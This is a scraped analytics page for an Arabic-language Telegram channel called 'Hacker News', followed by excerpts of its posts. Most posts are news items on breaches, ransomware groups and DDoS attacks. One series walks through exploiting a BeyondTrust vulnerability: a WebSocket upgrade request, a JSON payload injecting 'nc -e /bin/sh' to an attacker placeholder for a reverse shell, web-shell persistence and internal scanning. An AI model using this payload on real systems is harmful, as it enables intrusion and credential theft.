Hacker News
المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين صفحتنا الأولى https://www.facebook.com/HackerNews2
Show more📈 Analytical overview of Telegram channel Hacker News
Channel Hacker News (@hackernewsar) in the Arabic language segment is an active participant. Currently, the community unites 13 296 subscribers, ranking 9 599 in the Technologies & Applications category and 5 750 in the Saudi Arabia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 13 296 subscribers.
According to the latest data from 25 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 4 over the last 30 days and by -3 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 14.31%. Within the first 24 hours after publication, content typically collects 5.13% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 903 views. Within the first day, a publication typically gains 682 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 17.
- Thematic interests: Content is focused on key topics such as نِظَام, شَرِكَة, اِختِرَاق, مَجمُوعَة, بَيَان.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين
صفحتنا الأولى https://www.facebook.com/HackerNews2”
Thanks to the high frequency of updates (latest data received on 26 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
وأعرب رئيس الوزراء النيوزيلندي كريستوفر لوكسون عن قلقه البالغ حيال الحادثة، داعياً إلى تشديد قوانين الأمن السيبراني في البلاد، وأكدت السلطات الصحية في نيوزيلندا والشرطة أن الأولوية القصوى حالياً هي سلامة المرضى والتحقق من صحة البيانات قبل إعادة تشغيل النظام.#HackerNews #MediMap #CharlieKirk
ملاحظة: يمتلك دونالد ترامب منتجع وفندق فاخر (5 نجوم) يضم أجنحة وشققاً فندقية في لاس فيغاس.#HackerNews #ShinyHunters
* سبب الاختیار: أنظمة BeyondTrust ھي "بنوك كلمات مرور". الحصول على صلاحیة RCE یعني إمكانیة فك تشفیر كلمات المرور المخزنة والوصول إلى بقیة خوادم الشركة دون إثارة أي إنذار.3 سيناريو التخفي والبقاء (Persistence via Web Shell): یھدف المھاجم ھنا لضمان العودة للجھاز حتى لو قامت الشركة بإعادة تشغیله أو تغییر كلمات المرور. - الأدوات المستخدمة: بوابة خلفیة بسیطة (Web Shell) مكتوبة بـ PHP أو Python. - آلیة العمل: یرسل المھاجم أمراً عبر الـ WebSocket یقوم بإنشاء ملف جدید في مسار الویب الخاص بالمنصة مثلاً : /usr/share/web/shell.php یحتوي ھذا الملف على سطر برمجي واحد یسمح للمھاجم بإرسال أوامر عبر المتصفح مباشرة.
* سبب الاختیار: الـ Shell Web یمنح المھاجم "رابطاً سریاً" خاصاً به. حتى لو أغلق المھاجم اتصال الـ WebSocket الأول، یمكنه العودة في أي وقت عبر طلب HTTP بسیط للمسار الذي أنشأه.4 سیناریو "الاستطلاع الداخلي" (Internal Scanning) : استخدام جھاز BeyondTrust كـ "قفزة" للھجوم على الشبكة الداخلیة التي لا تظھر على الإنترنت. - الأدوات المستخدمة: Nmap أو سكربتات Bash مخصصة للمسح. - آلیة العمل: یقوم المھاجم بتحمیل أداة Nmap على جھاز BeyondTrust المخترق، ثم یأمره بمسح الأجھزة المجاورة له في الشبكة المحلیة (مثل أجھزة المدیر المالي أو خوادم البیانات).
* سبب الاختیار: جھاز BeyondTrust موثوق به داخل الشبكة، فعملیات المسح القادمة منه لن تبدو مشبوھة لأنظمة الأمان الداخلیة وليس كما لو كانت قادمة من عنوان IP خارجي.#HackerNews #BeyondTrust
* سبب الاختیار: لأن الـ Reverse Shell یجعل جھاز الضحیة ھو من "یتصل" بالمھاجم، وھو ما تسمح بھ معظم جدران الحمایة (Outbound Traffic)، مما یضمن للمھاجم بقاء الاتصال مستقراً لفترة طویلة.#HackerNews #BeyondTrust
GET /nw HTTP/1.1 Host: [Target_IP] Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: [Random_Key] Sec-WebSocket-Version: 13بمجرد رد الخادم بـ Protocols Switching 101 ، یصبح الطریق مفتوحاً لإرسال "الحمولات" (Payloads) مباشرة إلى المعالج الداخلي دون قیود HTTP التقلیدیة. إرسال الحمولة (بعد الترقیة): بعد نجاح الترقیة، یرسل المھاجم رسالة بصیغة JSON عبر قناة الـ WebSocket المفتوحة:
{"remoteVersion": "$(nc -e /bin/sh [Attacker_IP] [Port])"}
ھنا یظن النظام أنه یستلم "رقم إصدار"، لكن بسبب استخدام Evaluation Arithmetic Bash بشكل غیر آمن، یقوم النظام بتنفیذ الأمر الموجود بین القوسین (...)$ فورا،ً مما یعطي المھاجم "صلاحیة الوصول الكاملة" (Shell Reverse) BeyondTrust Release Notes .
#HackerNews
#BeyondTrustوشملت البيانات المسروقة: -بيانات العملاء: هويات الشركات التي تتعامل معها، العقود، والأرقام الضريبية. -التقارير المالية: ميزانيات الشركات، كشوفات الرواتب، والحسابات البنكية. -أسرار تجارية: استشارات قانونية ومالية حساسة.تستخدم مجموعة الهاكرز Tengu أسلوب "الابتزاز المزدوج" حيث تقوم بتشفير الملفات مما يجعل من المستحيل فتحها، وتطلب "فدية" مالية بالعملات الرقمية مقابل عدم نشر هذه البيانات. استهدفت مجموعة Tengu منذ ظهورها لأول مرة في 21 أكتوبر 2025 أكثر من 43 ضحية حول العالم، تركز بشكل كبير على قطاعات التصنيع، التكنولوجيا، الخدمات اللوجستية، والمحاسبة. #HackerNews #Tengu #DarkWeb
-بيانات الحساب: أرقام الحسابات الدولية (IBAN/RIB) -نوع الحسابات (جاري، ادخار، أوراق مالية) واسم البنك. -بيانات صاحب الحساب: الاسم الكامل، تاريخ ومكان الميلاد، والعنوان. -الحالات: تواريخ فتح الحساب أو إغلاقه أو تعديله. -الأرقام الضريبية.وصفت وزارة الاقتصاد والمديرية العامة للمالية العامة (DGFiP) المنفذ بأنه "طرف خبيث" (Malicious actor) استخدم هويات رقمية مسروقة تخص أحد الموظفين الحكوميين للوصول إلى النظام. وبدأت الوزارة بإبلاغ الأشخاص المتضررين بشكل شخصي، وتم تقديم شكوى جنائية وإبلاغ هيئة حماية البيانات الفرنسية (CNIL). #HackerNews
تتعلق الثغرة بأنظمة المؤسسات (Enterprise Systems) الضخمة، وليست أجهزة استهلاكية (مثل اللاب توب). تستهدف البنية التحتية لمراكز البيانات (Data Centers).#HackerNews #CVE_2026_22769 #رمضان_مبارك
وجه المسؤولون في كييف أصابع الاتهام إلى مجموعات مرتبطة بروسيا أو مجموعات تعمل لصالحها، في هجمات مماثلة سابقة وقعت في فبراير، نُسبت العمليات لمجموعات مثل "NoName057(16)"، وهي مجموعة تنشط في تنفيذ هجمات حجب الخدمة (DDoS).#HackerNews
تشير التقديرات الأولية إلى وصول المهاجمين إلى بيانات شخصية للعملاء تشمل الأسماء، وأرقام الهواتف، والبريد الإلكتروني، وعناوين الشحن، و تم إيقاف المتجر مؤقتاً لإجراء التحقيقات وتقييم الأضرار الناتجة عن هذا النوع من الهجمات المعروف بـ "هجوم سلاسل التوريد".فيما واجه بنك "A-Bank" إلى جانب بنوك ومؤسسات مالية أخرى هجمات من نوع "حجب الخدمة الموزعة" (DDoS)، مما أدى إلى تعطل مؤقت في خدمات الدفع عبر الإنترنت، وتطبيقات الهاتف المحمول، وعمليات السحب من أجهزة الصراف الآلي. #HackerNews
مجموعة The Gentlemen هي مجموعة برمجيات فدية ظهرت بنشاط متزايد منذ أواخر عام 2025، وتستخدم تقنيات متطورة مثل استغلال برامج تشغيل ويندوز (Windows drivers) والتلاعب بسياسات المجموعات (GPO) لتجاوز الدفاعات الأمنية. سجلت المجموعة 128 ضحية حول العالم حتى أوائل فبراير 2026.يأتي هذا الهجوم تزامناً مع إعلان مجلس الأمن السيبراني لحكومة الإمارات في 18 فبراير 2026 عن آلاف محاولات الاختراق يومياً، مشيراً إلى أن قطاعي النقل والخدمات المالية هما من بين الأكثر استهدافاً منذ بداية العام. #HackerNews #TheGentlemen
أمضى موقع Drop Site News الأشهر الماضية في كشف صلات إبستين بالمخابرات الأمريكية والإسر*ائيلية. و بالتعاون مع موقع Jmail لجعل ملفات إبستين الكاملة متاحة وقابلة للبحث.#HackerNews #DropSiteNews #Jmail #EPSTEIN
وسعى إبستين من خلال المشروع إلى تطوير أدوات استخباراتية جديدة تهدف إلى "اعتراض" وفهم الاتصالات والرسائل المتبادلة بين الخلايا الحية داخل الكائنات الحية.#HackerNews #DropSiteNews #Jmail #EPSTEIN
Available now! Telegram Research 2025 — the year's key insights 
